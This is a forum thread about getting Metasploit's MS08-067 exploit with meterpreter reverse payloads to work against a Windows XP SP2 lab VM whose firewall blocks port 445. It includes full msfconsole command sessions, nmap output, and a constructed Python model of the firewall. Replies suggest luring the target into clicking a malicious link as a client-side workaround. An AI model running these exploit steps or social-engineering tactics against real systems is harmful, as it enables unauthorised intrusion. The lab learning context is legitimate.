[microsoft exploit] ms08_067_netapi


pierre

Hello,

I am currently working on this exploit.
It works well when the XP firewall is turned off.

Unfortunately, when I turn it on, the exploit doesn't work anymore.

Topology:

Sans_titre.jpg

Procedure:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.

Have you got any clue how to bypass the Windows firewall?!


Try using the reverse_https payload instead of tcp. See if that works while the firewall is enabled. BTW, which MS XP version are you testing against?

I tried both the http and https payloads, no results.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.

I'm trying to exploit a Windows XP SP2.

I think the firewall blocks incoming port 445. The exploit fails.

Yes, but because the destination port is 80 with the http payload, I thought it wouldn't block it anymore...


root@osboxes:~# ping 192.168.0.3
PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data.
^C
--- 192.168.0.3 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2016ms

root@osboxes:~# nmap -p 445 192.168.0.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-14 11:17 EDT
Nmap scan report for 192.168.0.3
Host is up (0.00048s latency).
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds

The firewall is indeed active, so port 445 is filtered and doesn't respond to connection attempts, so Metasploit fails, right?

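The reason the http/https payloads make no difference, modelled as a small stateful host-firewall simulation. This is an added example, not Metasploit code or anything from the thread: the XP SP2 policy (drop unsolicited inbound, allow outbound and return traffic), the port numbers and the two-stage sequence are assumptions chosen to mirror the output above.

```python
"""Constructed model of the XP SP2 host firewall and of a two-stage
Metasploit run (exploit delivery over SMB, then the payload's callback).
Assumption: default policy drops every inbound connection that the host
did not initiate and that has no explicit exception, and allows outbound."""
from dataclasses import dataclass, field


@dataclass
class HostFirewall:
    host: str
    inbound_exceptions: set = field(default_factory=set)  # ports opened on purpose
    established: set = field(default_factory=set)         # (remote_ip, remote_port, local_port)

    def outbound(self, remote_ip, remote_port, local_port=50000):
        # The host initiates this connection; remember it so replies are allowed.
        self.established.add((remote_ip, remote_port, local_port))
        return "allowed"

    def inbound(self, remote_ip, remote_port, local_port):
        if (remote_ip, remote_port, local_port) in self.established:
            return "allowed"   # return traffic for a connection the host opened
        if local_port in self.inbound_exceptions:
            return "allowed"   # an explicit exception, e.g. file sharing enabled
        return "dropped"       # silently dropped: nmap reports the port as 'filtered'


def simulate_run(fw, attacker_ip, payload_port):
    """Stage 1 is the exploit itself: an inbound connection to SMB on 445.
    It is the same for every payload. Stage 2 is the reverse payload's
    outbound callback (4444, 8080, 8443...) and only exists if stage 1 succeeded."""
    stage1 = fw.inbound(attacker_ip, 40000, 445)
    if stage1 != "allowed":
        return {"exploit_delivery": stage1, "payload_callback": "never attempted"}
    stage2 = fw.outbound(attacker_ip, payload_port)
    return {"exploit_delivery": stage1, "payload_callback": stage2}


if __name__ == "__main__":
    target = HostFirewall("192.168.0.3")                     # firewall on, no exceptions
    for port in (4444, 8080, 8443):                         # tcp, http, https payloads
        print(port, simulate_run(target, "192.168.0.1", port))
    target_off = HostFirewall("192.168.0.3", inbound_exceptions={445})
    print("firewall off / 445 open:", simulate_run(target_off, "192.168.0.1", 8080))
```

Changing the payload only changes stage 2; with port 445 filtered, stage 1 never completes, which is the ConnectionTimeout in the output above.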

Looks about right... this firewall won't let connections in, BUT outbound traffic is allowed; you can exploit this with a crafted web link.

You should look into client-side attacks for port 445... Metasploit will launch a web server hosting exploit code, and when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse_shell of some kind.

Hmm, so first the client has to be social-engineered.
